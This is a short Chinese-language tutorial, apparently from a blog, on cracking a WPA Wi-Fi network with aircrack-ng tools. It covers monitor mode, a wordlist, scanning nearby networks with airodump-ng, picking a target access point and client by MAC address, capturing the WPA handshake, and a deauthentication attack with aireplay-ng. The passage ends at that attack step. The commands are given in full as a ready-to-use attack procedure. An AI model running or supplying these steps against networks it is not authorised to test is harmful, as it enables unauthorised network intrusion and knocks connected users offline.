1、准备工作
a、将网卡设置为monitor模式,在前述博文的抓包方法中有说明,不再赘述;
b、准备字典文件wordlists.txt。
2、探测阶段
通过sudo airodump-ng wlan0mon命令探测周边802.11网络的情况:
比如这里,可以看到FC:D7:33:3F:BC:F8的AP下挂了两个STA。
根据扫描的情况,选一个合适的破解的对象,比如这里的FC:D7:33:3F:BC:F8这个AP和08:ED:B9:89:FB:B1这个STA。
3、开启抓包
sudo airodump-ng --ivs --bssid FC:D7:33:3F:BC:F8 –w loghack -c 11 wlan0mon
这里的BSSID信息、信道信息等要和前面探测阶段获得的信息一致。
这个抓包要一直抓,直到抓到完整的WPA交互过程报文。
4、攻击阶段
sudo aireplay-ng -0 1 –a FC:D7:33:3F:BC:F8 -c 08:ED:B9:89:FB:B1 wlan0mon